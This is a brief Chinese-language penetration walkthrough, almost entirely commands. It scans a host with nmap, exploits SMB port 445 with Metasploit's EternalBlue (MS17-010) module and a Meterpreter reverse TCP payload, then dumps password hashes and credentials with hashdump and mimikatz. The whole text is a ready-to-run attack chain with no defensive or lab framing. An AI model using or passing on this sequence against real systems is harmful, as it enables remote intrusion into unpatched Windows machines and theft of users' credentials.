扫描目标主机开放端口
nmap -sV -Pn ip
查看是否开放445端口
是则继续
msfconsole
use windows/smb/ms17_010_eternalblue
set rhosts ip
set payload windows/x64/meterpreter/reverse_tcp
set lhost
set lport
run
后渗透操作(获取用户名和密码)
hashdump
load mimikatz
msv
kerberos
然后用户名和密码就出现在你面前了